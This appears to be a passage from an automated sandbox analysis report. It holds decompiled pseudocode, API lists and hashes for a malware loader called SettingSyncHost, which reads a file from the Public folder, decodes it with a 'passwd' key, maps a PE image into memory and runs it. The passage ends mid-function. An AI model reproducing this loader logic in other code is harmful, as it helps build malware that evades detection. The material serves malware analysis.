                                                                                                                                      				 *_t162 = _t223;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t223;
                                                                                                                                      				_t163 = _t162 + 8;
                                                                                                                                      				_t18 = CreateFileW("C:\Users\Public\SettingSyncHost", 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                      				 *0x4ee604 = E003931A1(_t18, _t163 - _t163);
                                                                                                                                      				_t164 = _t163 - 8;
                                                                                                                                      				_t224 =  *0x3bbc50;
                                                                                                                                      				 *_t164 = _t224;
                                                                                                                                      				E00393700(_t135);
                                                                                                                                      				 *_t164 = _t224;
                                                                                                                                      				E003935B0(_t135);
                                                                                                                                      				 *_t164 = _t224;
                                                                                                                                      				E00393460(_t135);
                                                                                                                                      				 *_t164 = _t224;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t224;
                                                                                                                                      				_t165 = _t164 + 8;
                                                                                                                                      				_t24 =  *0x4ee604; // 0xcc
                                                                                                                                      				_t28 = GlobalAlloc(0, E003931A1(GetFileSize(_t24, 0), _t165 - _t165) + 0x2710); // executed
                                                                                                                                      				 *0x4ee5b0 = E003931A1(_t28, _t165 - _t165);
                                                                                                                                      				_t166 = _t165 - 8;
                                                                                                                                      				_t225 =  *0x3bbc50;
                                                                                                                                      				 *_t166 = _t225;
                                                                                                                                      				E00393700(_t135);
                                                                                                                                      				 *_t166 = _t225;
                                                                                                                                      				E003935B0(_t135);
                                                                                                                                      				 *_t166 = _t225;
                                                                                                                                      				E00393460(_t135);
                                                                                                                                      				 *_t166 = _t225;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t225;
                                                                                                                                      				_t167 = _t166 + 8;
                                                                                                                                      				_t34 =  *0x4ee604; // 0xcc
                                                                                                                                      				_t35 = SetFilePointer(_t34, 0, 0, 0); // executed
                                                                                                                                      				E003931A1(_t35, _t167 - _t167);
                                                                                                                                      				_t168 = _t167 - 8;
                                                                                                                                      				_t226 =  *0x3bbc50;
                                                                                                                                      				 *_t168 = _t226;
                                                                                                                                      				E00393700(_t135);
                                                                                                                                      				 *_t168 = _t226;
                                                                                                                                      				E003935B0(_t135);
                                                                                                                                      				 *_t168 = _t226;
                                                                                                                                      				E00393460(_t135);
                                                                                                                                      				 *_t168 = _t226;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t226;
                                                                                                                                      				_t169 = _t168 + 8;
                                                                                                                                      				_t141 = _t169;
                                                                                                                                      				_t41 =  *0x4ee604; // 0xcc
                                                                                                                                      				_t43 = E003931A1(GetFileSize(_t41, 0), _t169 - _t169);
                                                                                                                                      				_t131 =  *0x4ee5b0; // 0xe58c20
                                                                                                                                      				_t136 =  *0x4ee604; // 0xcc
                                                                                                                                      				_t44 = ReadFile(_t136, _t131, _t43, 0x4ee850, 0); // executed
                                                                                                                                      				E003931A1(_t44, _t169 - _t169);
                                                                                                                                      				_t170 = _t169 - 8;
                                                                                                                                      				_t227 =  *0x3bbc50;
                                                                                                                                      				 *_t170 = _t227;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t170 = _t227;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t170 = _t227;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t170 = _t227;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t227;
                                                                                                                                      				_t50 =  *0x4ee5b0; // 0xe58c20
                                                                                                                                      				 *0x4ee5b0 = _t50 + 0x3ac00;
                                                                                                                                      				_t172 = _t170 + 8 - 8;
                                                                                                                                      				_t228 =  *0x3bbc50;
                                                                                                                                      				 *_t172 = _t228;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t172 = _t228;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t172 = _t228;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t172 = _t228;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t228;
                                                                                                                                      				E00394F30("passwd", "aasswd");
                                                                                                                                      				_t175 = _t172 + 0x10 - 8;
                                                                                                                                      				_t229 =  *0x3bbc50;
                                                                                                                                      				 *_t175 = _t229;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t175 = _t229;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t175 = _t229;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t175 = _t229;
                                                                                                                                      				_t60 = E00393340();
                                                                                                                                      				st0 = _t229;
                                                                                                                                      				_t176 = _t175 + 8;
                                                                                                                                      				GetSystemTime(0x4ee610);
                                                                                                                                      				E003931A1(_t60, _t176 - _t176);
                                                                                                                                      				_t177 = _t176 - 8;
                                                                                                                                      				_t230 =  *0x3bbc50;
                                                                                                                                      				 *_t177 = _t230;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t177 = _t230;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t177 = _t230;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t177 = _t230;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t230;
                                                                                                                                      				 *0x4ee5e0 = 0x4ee610->wYear & 0x0000ffff ^ 0x00000795;
                                                                                                                                      				_t179 = _t177 + 8 - 8;
                                                                                                                                      				_t231 =  *0x3bbc50;
                                                                                                                                      				 *_t179 = _t231;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t179 = _t231;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t179 = _t231;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t179 = _t231;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t231;
                                                                                                                                      				_t72 = E00394EA0("passwd");
                                                                                                                                      				_t181 = _t179 + 0xc;
                                                                                                                                      				_t73 =  *0x4ee604; // 0xcc
                                                                                                                                      				_t75 = E003931A1(GetFileSize(_t73, 0), _t181 - _t181);
                                                                                                                                      				_t132 =  *0x4ee5b0; // 0xe58c20
                                                                                                                                      				L0039101E(__ebx, _t169, _t181, _t132, _t75 - 0x3ac00, "passwd", _t72);
                                                                                                                                      				_t183 = _t181 + 0x10 - 8;
                                                                                                                                      				_t232 =  *0x3bbc50;
                                                                                                                                      				 *_t183 = _t232;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t183 = _t232;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t183 = _t232;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t183 = _t232;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t232;
                                                                                                                                      				_t184 = _t183 + 8;
                                                                                                                                      				_t151 = _t184;
                                                                                                                                      				 *0x4ee5b8 = E003931A1(GetModuleHandleA(0), _t184 - _t184);
                                                                                                                                      				_t185 = _t184 - 8;
                                                                                                                                      				_t233 =  *0x3bbc50;
                                                                                                                                      				 *_t185 = _t233;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t185 = _t233;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t185 = _t233;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t185 = _t233;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t233;
                                                                                                                                      				_t88 =  *0x4ee5b0; // 0xe58c20
                                                                                                                                      				L00391032(__ebx, _t136, _t169, _t184, _t88); // executed
                                                                                                                                      				_t188 = _t185 + 0xc - 8;
                                                                                                                                      				_t234 =  *0x3bbc50;
                                                                                                                                      				 *_t188 = _t234;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t188 = _t234;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t188 = _t234;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t188 = _t234;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t234;
                                                                                                                                      				_t94 =  *0x4ee5b8; // 0x390000
                                                                                                                                      				L0039100A(__ebx, _t136, _t141, _t184, 0x3c8900, _t94);
                                                                                                                                      				_t191 = _t188 + 0x10 - 8;
                                                                                                                                      				_t235 =  *0x3bbc50;
                                                                                                                                      				 *_t191 = _t235;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t191 = _t235;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t191 = _t235;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t191 = _t235;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t235;
                                                                                                                                      				L00391028(_t128, _t136, _t141, _t151, 0x3c8900); // executed
                                                                                                                                      				_t194 = _t191 + 0xc - 8;
                                                                                                                                      				_t236 =  *0x3bbc50;
                                                                                                                                      				 *_t194 = _t236;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t194 = _t236;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t194 = _t236;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t194 = _t236;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t236;
                                                                                                                                      				L00391005(_t128, _t141, _t151, 0x3c8900); // executed
                                                                                                                                      				_t197 = _t194 + 0xc - 8;
                                                                                                                                      				_t237 =  *0x3bbc50;
                                                                                                                                      				 *_t197 = _t237;
                                                                                                                                      				E00393700(_t136);
                                                                                                                                      				 *_t197 = _t237;
                                                                                                                                      				E003935B0(_t136);
                                                                                                                                      				 *_t197 = _t237;
                                                                                                                                      				E00393460(_t136);
                                                                                                                                      				 *_t197 = _t237;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t237;
                                                                                                                                      				L00391019(_t128, _t136, _t141, _t151, 0x3c8900);
                                                                                                                                      				_t199 = _t197 + 0xc;
                                                                                                                                      				_t111 =  *0x3c893c; // 0x100
                                                                                                                                      				 *0x4ee600 = _t111 + 0x3c8900;
                                                                                                                                      				_t113 =  *0x4ee600; // 0x3c8a00
                                                                                                                                      				_t3 = _t113 + 0x28; // 0x10be8
                                                                                                                                      				 *0x4ee5b4 =  *_t3 + 0x3c8900;
                                                                                                                                      				_t114 =  *0x4ee5b4(); // executed
                                                                                                                                      				E003931A1(_t114, _t199 - _t199);
                                                                                                                                      				if(E003931A1(GetTickCount(), _t199 - _t199) == 0) {
                                                                                                                                      					E00394E3F(0, 0);
                                                                                                                                      					_t199 = _t199 + 8;
                                                                                                                                      				}
                                                                                                                                      				_t154 = _t199;
                                                                                                                                      				_t119 = E003931A1(GetTickCount(), _t199 - _t199);
                                                                                                                                      				_t216 = _t119;
                                                                                                                                      				if(_t119 == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      					E00394CF3(_t128, _t136, _t141, _t154, _t216);
                                                                                                                                      					_t199 = _t199 + 4;
                                                                                                                                      				}
                                                                                                                                      				_t155 = _t199;
                                                                                                                                      				_t121 = E003931A1(GetTickCount(), _t199 - _t199);
                                                                                                                                      				_t218 = _t121;
                                                                                                                                      				if(_t121 == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      					E00394BA9(_t128, _t136, _t141, _t155, _t218);
                                                                                                                                      					_t199 = _t199 + 4;
                                                                                                                                      				}
                                                                                                                                      				_t156 = _t199;
                                                                                                                                      				_t123 = E003931A1(GetTickCount(), _t199 - _t199);
                                                                                                                                      				_t220 = _t123;
                                                                                                                                      				if(_t123 == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_t123 = E00394A35(_t128, _t141, _t156, _t220);
                                                                                                                                      					_t199 = _t199 + 8;
                                                                                                                                      				}
                                                                                                                                      				return E003931A1(_t123, _t157 - _t199 + 0xc0);
                                                                                                                                      			}

                                                                                                                                      0x00392d68
                                                                                                                                      0x00392d6d
                                                                                                                                      0x00392d70
                                                                                                                                      0x00392d75
                                                                                                                                      0x00392d77
                                                                                                                                      0x00392d7a
                                                                                                                                      0x00392d8b
                                                                                                                                      0x00392d90
                                                                                                                                      0x00392d93
                                                                                                                                      0x00392d99
                                                                                                                                      0x00392d9c
                                                                                                                                      0x00392da1
                                                                                                                                      0x00392da4
                                                                                                                                      0x00392da9
                                                                                                                                      0x00392dac
                                                                                                                                      0x00392db1
                                                                                                                                      0x00392db4
                                                                                                                                      0x00392db9
                                                                                                                                      0x00392dbe
                                                                                                                                      0x00392dc4
                                                                                                                                      0x00392dcc
                                                                                                                                      0x00392dcf
                                                                                                                                      0x00392dd5
                                                                                                                                      0x00392dd8
                                                                                                                                      0x00392ddd
                                                                                                                                      0x00392de0
                                                                                                                                      0x00392de5
                                                                                                                                      0x00392de8
                                                                                                                                      0x00392ded
                                                                                                                                      0x00392df0
                                                                                                                                      0x00392df5
                                                                                                                                      0x00392dfa
                                                                                                                                      0x00392e05
                                                                                                                                      0x00392e0d
                                                                                                                                      0x00392e10
                                                                                                                                      0x00392e16
                                                                                                                                      0x00392e19
                                                                                                                                      0x00392e1e
                                                                                                                                      0x00392e21
                                                                                                                                      0x00392e26
                                                                                                                                      0x00392e29
                                                                                                                                      0x00392e2e
                                                                                                                                      0x00392e31
                                                                                                                                      0x00392e36
                                                                                                                                      0x00392e40
                                                                                                                                      0x00392e48
                                                                                                                                      0x00392e4b
                                                                                                                                      0x00392e51
                                                                                                                                      0x00392e54
                                                                                                                                      0x00392e59
                                                                                                                                      0x00392e5c
                                                                                                                                      0x00392e61
                                                                                                                                      0x00392e64
                                                                                                                                      0x00392e69
                                                                                                                                      0x00392e6c
                                                                                                                                      0x00392e71
                                                                                                                                      0x00392e7b
                                                                                                                                      0x00392e83
                                                                                                                                      0x00392e86
                                                                                                                                      0x00392e8c
                                                                                                                                      0x00392e8f
                                                                                                                                      0x00392e94
                                                                                                                                      0x00392e97
                                                                                                                                      0x00392e9c
                                                                                                                                      0x00392e9f
                                                                                                                                      0x00392ea4
                                                                                                                                      0x00392ea7
                                                                                                                                      0x00392eac
                                                                                                                                      0x00392eb6
                                                                                                                                      0x00392ebb
                                                                                                                                      0x00392ebe
                                                                                                                                      0x00392ec8
                                                                                                                                      0x00392ecd
                                                                                                                                      0x00392ed2
                                                                                                                                      0x00392edb
                                                                                                                                      0x00392ee3
                                                                                                                                      0x00392eeb
                                                                                                                                      0x00392f01
                                                                                                                                      0x00392f07
                                                                                                                                      0x00392f0c
                                                                                                                                      0x00392f0c
                                                                                                                                      0x00392f0f
                                                                                                                                      0x00392f19
                                                                                                                                      0x00392f1e
                                                                                                                                      0x00392f20
                                                                                                                                      0x00392f22
                                                                                                                                      0x00392f24
                                                                                                                                      0x00392f29
                                                                                                                                      0x00392f29
                                                                                                                                      0x00392f2c
                                                                                                                                      0x00392f36
                                                                                                                                      0x00392f3b
                                                                                                                                      0x00392f3d
                                                                                                                                      0x00392f3f
                                                                                                                                      0x00392f41
                                                                                                                                      0x00392f46
                                                                                                                                      0x00392f46
                                                                                                                                      0x00392f49
                                                                                                                                      0x00392f53
                                                                                                                                      0x00392f58
                                                                                                                                      0x00392f5a
                                                                                                                                      0x00392f5c
                                                                                                                                      0x00392f5e
                                                                                                                                      0x00392f60
                                                                                                                                      0x00392f65
                                                                                                                                      0x00392f65
                                                                                                                                      0x00392f7b

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,C:\Users\Public\SettingSyncHost,00000208), ref: 00392A5C
                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000), ref: 00392A6A
                                                                                                                                        • Part of subcall function 003931A1: _RTC_Failure.LIBCMT ref: 003931B4
                                                                                                                                      • CreateFileW.KERNELBASE(C:\Users\Public\SettingSyncHost,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00392ABB
                                                                                                                                      • GetFileSize.KERNEL32(000000CC,00000000), ref: 00392B05
                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,-00002710), ref: 00392B1C
                                                                                                                                      • SetFilePointer.KERNELBASE(000000CC,00000000,00000000,00000000), ref: 00392B6A
                                                                                                                                      • GetFileSize.KERNEL32(000000CC,00000000,004EE850,00000000), ref: 00392BB8
                                                                                                                                      • ReadFile.KERNELBASE(000000CC,00E58C20,00000000), ref: 00392BD4
                                                                                                                                      • _strcat.LIBCMT ref: 00392C56
                                                                                                                                      • GetSystemTime.KERNEL32(004EE610), ref: 00392C93
                                                                                                                                      • _strlen.LIBCMT ref: 00392D12
                                                                                                                                      • GetFileSize.KERNEL32(000000CC,00000000,passwd,00000000), ref: 00392D2A
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00392D7E
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392EF2
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392F11
                                                                                                                                      • _perror.LIBCMT ref: 00392F24
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392F2E
                                                                                                                                      • _wprintf.LIBCMT ref: 00392F41
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00392F4B
                                                                                                                                      • _setlocale.LIBCMT ref: 00392F60
                                                                                                                                        • Part of subcall function 00394E3F: __wfsopen.LIBCMT ref: 00394E4C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CountTick$ModuleSize$Handle$AllocCreateFailureGlobalNamePointerReadSystemTime__wfsopen_perror_setlocale_strcat_strlen_wprintf
                                                                                                                                      • String ID: C:\Users\Public\SettingSyncHost$aasswd$passwd
                                                                                                                                      • API String ID: 1808579253-4271608098
                                                                                                                                      • Opcode ID: 9eda9d0a0f512cb5910aabdff6bb9e8a69fb25f89dbc9b0703d4399baff8e7f3
                                                                                                                                      • Instruction ID: 4df71118f2aa992af0dd2576ed758ffbb562ca06af7bdcca57244c8cf04ad1d8
                                                                                                                                      • Opcode Fuzzy Hash: 9eda9d0a0f512cb5910aabdff6bb9e8a69fb25f89dbc9b0703d4399baff8e7f3
                                                                                                                                      • Instruction Fuzzy Hash: 57C141F1948505D6DA167B79EC8F62DFE64EF04709F4209B4F4C4591A2EF324E28839B
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: E.9$E.9$HN
                                                                                                                                      • API String ID: 0-2062183627
                                                                                                                                      • Opcode ID: 93c327b60ad14be747b758385798ba56a4e336f1cf163c9e3563947ccfaa6146
                                                                                                                                      • Instruction ID: 7cdd41354137134373b700973efa93a56e0795d1c081bb609876762c97770249
                                                                                                                                      • Opcode Fuzzy Hash: 93c327b60ad14be747b758385798ba56a4e336f1cf163c9e3563947ccfaa6146
                                                                                                                                      • Instruction Fuzzy Hash: 8071EDF0908406D6CB0A7F69E88F16CFFB4FF04759F0109A9F4C4591A2EF324A28875A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 850 3d0640-3d0690 call 3d9dea 853 3d06c1-3d06c7 850->853 854 3d0692-3d06a1 call 3d9dea 850->854 855 3d06d9 853->855 856 3d06c9-3d06d1 853->856 863 3d06b3-3d06bb call 3d9e42 854->863 864 3d06a3-3d06ae 854->864 860 3d06db-3d06df 855->860 858 3d06d7 856->858 859 3d0766-3d078b call 3d9e42 call 3d8ec4 856->859 858->860 865 3d06f1-3d06f3 860->865 866 3d06e1-3d06e9 call 3d9fc7 860->866 863->853 864->863 865->859 870 3d06f5-3d06f7 865->870 866->870 878 3d06eb-3d06ee 866->878 874 3d06fd-3d0718 call 3d8ed5 870->874 875 3d06f9-3d06fb 870->875 880 3d071a-3d071f 874->880 881 3d0726 874->881 875->859 878->865 882 3d072b-3d072f call 3cb580 880->882 883 3d0721-3d0724 880->883 881->882 885 3d0734-3d0760 call 3cb630 call 3d9f9b 882->885 883->882 885->859
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D0676
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D0696
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D06B6
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D0751
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0769
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                      • Opcode ID: 2bb9c09aa9fad5e654f9926b126f8b5d96d91f196671d341b4f752b839b10b64
                                                                                                                                      • Instruction ID: b3926ca85b4dd29934c58d52650b0c5c7193c5f8228c91ff76e7722ae623f20e
                                                                                                                                      • Opcode Fuzzy Hash: 2bb9c09aa9fad5e654f9926b126f8b5d96d91f196671d341b4f752b839b10b64
                                                                                                                                      • Instruction Fuzzy Hash: 12418E72A00219CFCB16DF54EA81B6EB7B4FB44B10F15416FE846AB381DB74AE05CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 26%
                                                                                                                                      			E003922C0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                      				intOrPtr _v12;
                                                                                                                                      				signed short _v24;
                                                                                                                                      				signed int _v36;
                                                                                                                                      				long _v48;
                                                                                                                                      				intOrPtr _v60;
                                                                                                                                      				void _v256;
                                                                                                                                      				int _t75;
                                                                                                                                      				void* _t80;
                                                                                                                                      				void* _t82;
                                                                                                                                      				void* _t115;
                                                                                                                                      				long _t118;
                                                                                                                                      				void* _t130;
                                                                                                                                      				void* _t131;
                                                                                                                                      				long long* _t133;
                                                                                                                                      				long long* _t136;
                                                                                                                                      				long long* _t138;
                                                                                                                                      				long long* _t140;
                                                                                                                                      				long long* _t142;
                                                                                                                                      				void* _t143;
                                                                                                                                      				long long* _t144;
                                                                                                                                      				void* _t145;
                                                                                                                                      				long long* _t146;
                                                                                                                                      				long long* _t149;
                                                                                                                                      				long long* _t152;
                                                                                                                                      				long long _t155;
                                                                                                                                      				long long _t156;
                                                                                                                                      				long long _t157;
                                                                                                                                      				long long _t158;
                                                                                                                                      				long long _t159;
                                                                                                                                      				long long _t160;
                                                                                                                                      				long long _t161;
                                                                                                                                      				long long _t162;
                                                                                                                                      				long long _t163;
                                                                                                                                      
                                                                                                                                      				_t115 = __edx;
                                                                                                                                      				memset( &_v256, 0xcccccccc, 0x3f << 2);
                                                                                                                                      				_t5 = _a4 + 0x3c; // 0xffe200e8
                                                                                                                                      				_v60 = _a4 +  *_t5;
                                                                                                                                      				_t133 = _t131 + 0xc - 8;
                                                                                                                                      				_t155 =  *0x3bbc50;
                                                                                                                                      				 *_t133 = _t155;
                                                                                                                                      				E00393700(_t115);
                                                                                                                                      				 *_t133 = _t155;
                                                                                                                                      				E003935B0(_t115);
                                                                                                                                      				 *_t133 = _t155;
                                                                                                                                      				E00393460(_t115);
                                                                                                                                      				 *_t133 = _t155;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t155;
                                                                                                                                      				_t116 = _a4;
                                                                                                                                      				E003938C0(0x3c8900, _a4,  *((intOrPtr*)(_v60 + 0x54)));
                                                                                                                                      				_t136 = _t133 + 0x14 - 8;
                                                                                                                                      				_t156 =  *0x3bbc50;
                                                                                                                                      				 *_t136 = _t156;
                                                                                                                                      				E00393700(_a4);
                                                                                                                                      				 *_t136 = _t156;
                                                                                                                                      				E003935B0(_a4);
                                                                                                                                      				 *_t136 = _t156;
                                                                                                                                      				E00393460(_t116);
                                                                                                                                      				 *_t136 = _t156;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t156;
                                                                                                                                      				_t117 = _v60;
                                                                                                                                      				_v12 = _v60 + ( *(_v60 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                      				_t138 = _t136 + 8 - 8;
                                                                                                                                      				_t157 =  *0x3bbc50;
                                                                                                                                      				 *_t138 = _t157;
                                                                                                                                      				E00393700(_v60);
                                                                                                                                      				 *_t138 = _t157;
                                                                                                                                      				E003935B0(_t117);
                                                                                                                                      				 *_t138 = _t157;
                                                                                                                                      				E00393460(_t117);
                                                                                                                                      				 *_t138 = _t157;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t157;
                                                                                                                                      				_v24 =  *((intOrPtr*)(_v60 + 6));
                                                                                                                                      				_t140 = _t138 + 8 - 8;
                                                                                                                                      				_t158 =  *0x3bbc50;
                                                                                                                                      				 *_t140 = _t158;
                                                                                                                                      				E00393700(_t117);
                                                                                                                                      				 *_t140 = _t158;
                                                                                                                                      				E003935B0(_t117);
                                                                                                                                      				 *_t140 = _t158;
                                                                                                                                      				E00393460(_t117);
                                                                                                                                      				 *_t140 = _t158;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t158;
                                                                                                                                      				_t142 = _t140 + 8 - 8;
                                                                                                                                      				_t159 =  *0x3bbc50;
                                                                                                                                      				 *_t142 = _t159;
                                                                                                                                      				E00393700(_t117);
                                                                                                                                      				 *_t142 = _t159;
                                                                                                                                      				E003935B0(_t117);
                                                                                                                                      				 *_t142 = _t159;
                                                                                                                                      				E00393460(_t117);
                                                                                                                                      				 *_t142 = _t159;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t159;
                                                                                                                                      				_t143 = _t142 + 8;
                                                                                                                                      				_v36 = 0;
                                                                                                                                      				while((_v36 & 0x0000ffff) < (_v24 & 0x0000ffff)) {
                                                                                                                                      					_t149 = _t143 - 8;
                                                                                                                                      					_t162 =  *0x3bbc50;
                                                                                                                                      					 *_t149 = _t162;
                                                                                                                                      					E00393700(_t117);
                                                                                                                                      					 *_t149 = _t162;
                                                                                                                                      					E003935B0(_t117);
                                                                                                                                      					 *_t149 = _t162;
                                                                                                                                      					E00393460(_t117);
                                                                                                                                      					 *_t149 = _t162;
                                                                                                                                      					E00393340();
                                                                                                                                      					st0 = _t162;
                                                                                                                                      					_t117 =  *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900;
                                                                                                                                      					E003938C0( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900, _a4 +  *((intOrPtr*)(_v12 + 0x14 + (_v36 & 0x0000ffff) * 0x28)),  *((intOrPtr*)(_v12 + 0x10 + (_v36 & 0x0000ffff) * 0x28)));
                                                                                                                                      					_t152 = _t149 + 0x14 - 8;
                                                                                                                                      					_t163 =  *0x3bbc50;
